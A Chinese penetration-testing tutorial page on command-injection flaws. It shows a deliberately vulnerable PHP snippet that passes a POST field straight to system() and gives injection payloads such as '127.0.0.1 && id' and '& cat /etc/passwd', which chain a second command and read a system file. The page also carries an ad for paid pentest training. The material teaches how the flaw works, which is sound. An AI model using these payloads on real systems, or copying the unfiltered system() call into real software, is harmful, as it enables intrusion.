[原创]WEB安全第五章 漏洞学习与利用08命令执行漏洞与利用
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
WEB安全第五章 漏洞学习与利用08命令执行漏洞与利用
在部分WEB应用里,应用程序会提供一些命令执行操作,如没有过滤好用户输入的数据,就有可能产生命令执行漏洞 从而执行有危害系统命令。
[php]
<?php
if($_POST[‘ip’]){
echo system(‘ping ‘.$_POST[‘ip’]);
}
?>
[/php]
命令连接符号总结
command1 && command2 先执行command1后执行command2
127.0.0.1 && id
command1 | command2 只执行command2
![[原创]WEB安全第五章 漏洞学习与利用08命令执行漏洞与利用](https://www.moonsec.com/wp-content/uploads/2019/11/image001-14.png)
![[原创]WEB安全第五章 漏洞学习与利用08命令执行漏洞与利用](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
command1 & command2
先执行command1后执行command2
127.0.0.1 -c 3 & cat /etc/passwd
![[原创]WEB安全第五章 漏洞学习与利用08命令执行漏洞与利用](https://www.moonsec.com/wp-content/uploads/2019/11/image002-12.png)
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/290.html
赞 (2)
mOon
[原创]WEB安全五章 漏洞学习与利用07 代码执行漏洞与利用
« 上一篇
2019年11月26日 pm6:23
[原创]WEB安全第五章 漏洞学习与利用09CSRF漏洞和利用
下一篇 »
2019年11月26日 pm7:13
